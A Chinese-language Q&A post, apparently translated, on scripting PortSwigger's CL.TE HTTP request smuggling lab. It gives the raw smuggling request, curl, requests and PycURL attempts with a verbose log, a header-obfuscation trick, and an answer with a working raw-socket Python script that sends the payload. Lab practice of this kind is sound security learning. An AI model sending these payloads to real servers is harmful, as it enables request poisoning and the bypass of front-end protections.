包含CRLF字符和格式错误的标题的Python脚本POST正文。HTTP请求走私

Question

最近，我一直在尝试Portswiggers WebSecAcademy的HTTP请求走私实验，还有一个额外的挑战，那就是编写python脚本来为我完成这个挑战。

来自Burp Repeater的预期解决方案：

POST / HTTP/1.1
Host: ac971f2f1fe48ec180f863d5009000ed.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 8
Transfer-Encoding: chunked

0

G 

如果你右击并选择‘复制为curl命令’：

curl -i -s -k -X $'POST' \
    -H $'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 8' \
    --data-binary $'0\x0d\x0a\x0d\x0aG\x0d\x0a\x0d\x0a' \
    $'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'

尝试使用Curl执行此操作时，它会返回500内部服务器错误。

我已经设法使用Python requests模块完成了这项工作：

def POST_CLTE():
    url = 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/'
    headers = {'Host':'ac011f9b1f7e242780ce2272008a009d.web-security-academy.net','Connection':'keep-alive',
    'Content-Type':'application/x-www-form-urlencoded','Content-Length':'8', 'Transfer-Encoding':'chunked'}

    data = '0\x0d\x0a\x0d\x0aG\x0d\x0a'

    s = requests.Session()
    r = requests.Request('POST', url, headers=headers, data=data)
    prepared = r.prepare()
    response = s.send(prepared)

    print(response.request.headers)
    print(response.status_code)
    print(response.text)

但我不喜欢我必须以dict的形式传递头部，当我想要包括一个混淆的头部时，它会报错，比如：

X: X[\n]Transfer-Encoding: chunked

我尝试使用PyCurl重现请求：

#!/usr/bin/python

import pycurl
from StringIO import StringIO

buffer = StringIO()
c = pycurl.Curl()
c.setopt(c.POST, 1)
c.setopt(c.URL, 'https://ac011f9b1f7e242780ce2272008a009d.web-security-academy.net/')
c.setopt(c.POSTFIELDS, '0\x0d\x0a\x0d\x0aG\x0d\x0a')
#c.setopt(pycurl.POSTFIELDSIZE, 8)
c.setopt(c.HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0',
    'Host: ac011f9b1f7e242780ce2272008a009d.web-security-academy.net',
    'Content-Length: 8',
    'Transfer-Encoding: chunked',
    'Content-Type: application/x-www-form-urlencoded'
    ])
#c.setopt(c.CRLF, 1)
c.setopt(c.VERBOSE, 1)
c.setopt(c.HEADER, 1)
c.setopt(c.WRITEDATA, buffer)
c.perform()
c.close()

body = buffer.getvalue()

print(body)

我喜欢我可以将头作为字符串数组传递，但不幸的是，我仍然收到500内部服务器错误：

*   Trying 18.200.141.238:443...                                                                                                                            
* TCP_NODELAY set                                                                                                                                           
* Connected to ac561fd21ed819768081009200f2002e.web-security-academy.net (18.200.141.238) port 443 (#0)                                                     
* found 387 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification OK
*        server certificate status verification SKIPPED
*        common name: web-security-academy.net (matched)
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=web-security-academy.net
*        start date: Fri, 05 Jul 2019 00:00:00 GMT
*        expire date: Wed, 05 Aug 2020 12:00:00 GMT
*        issuer: C=US,O=Amazon,OU=Server CA 1B,CN=Amazon
* ALPN, server did not agree to a protocol
> POST / HTTP/1.1
Host: ac561fd21ed819768081009200f2002e.web-security-academy.net
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:68.0) Gecko/20100101 Firefox/68.0 
Content-Length: 8
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded

8
* upload completely sent off: 15 out of 8 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 500 Internal Server Error
< Content-Type: application/json; charset=utf-8
< Connection: close
< Content-Length: 23
< 
* Closing connection 0
HTTP/1.1 500 Internal Server Error
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 23

"Internal Server Error"

这种行为的原因是什么？有没有什么我没有探索过的替代方案？任何建议都是非常感谢的。

Answer 1

套接字模块对我来说工作得很好。我觉得没有尝试一下有点傻，但我学到了很多。

代码：

import socket
import ssl

host = 'lab-id.web-security-academy.net'
port = 443
message = "POST / HTTP/1.1\r\n"
hostHeader = "Host: lab-id.web-security-academy.net\r\n"
contentLength = "Content-Length: 8\r\n"
transferEncoding = "Transfer-Encoding: chunked\r\n"
contentType = "Content-Type: application/x-www-urlencoded\r\n"
requestBody = "0\r\n\r\nG\r\n"

finalMessage = message + hostHeader + contentLength + transferEncoding + contentType + "\r\n" + requestBody

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sslWrappedSock = ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS)

sslWrappedSock.connect((host, port))
sslWrappedSock.sendall(finalMessage)

print(sslWrappedSock.recv(1024))

sslWrappedSock.close()